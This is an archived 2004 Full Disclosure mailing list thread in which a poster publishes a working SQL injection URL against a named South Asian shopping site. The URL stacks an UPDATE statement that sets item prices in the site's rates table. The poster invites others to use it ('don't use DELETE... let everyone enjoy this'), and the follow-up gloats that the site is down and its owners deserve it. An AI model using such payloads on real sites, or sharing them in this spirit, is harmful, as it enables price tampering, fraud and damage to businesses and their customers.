Full Disclosure mailing list archives

Re[2]: MUNCHAHOUSE more xploits

From: 01security <npguy () ysgnet com>
Date: Wed, 14 Jan 2004 16:18:54 +0545

Hello Jelmer,

seems the site down. i donno why ASP
guys are still unaware of such vuln.

muncha.com  pepole deserve this for their ignorance
and pathetic ego showing off.



Wednesday, January 14, 2004, 3:54:01 PM, you wrote:

Following example demonstrates how sql queries can be
injected in your web site.

Other exploitation has been avoided due to security
concern.


JK> Riiiiight...


JK> On Wed, 2004-01-14 at 09:21, 01security wrote:

check this ... how rate can be changed easily in one of the popular
shopping site of south-asia regiona...
(don't use DELETE right...let everyone enjoy this)...

http://www.muncha.com/item.asp?catid=&itemid=638;update%20tblitemrates%20set%20rate=2

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html






-- 
Best regards,
 01security                            mailto:npguy () ysgnet com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

MUNCHAHOUSE more xploits 01security (Jan 14)
- Message not available
  - Re[2]: MUNCHAHOUSE more xploits 01security (Jan 14)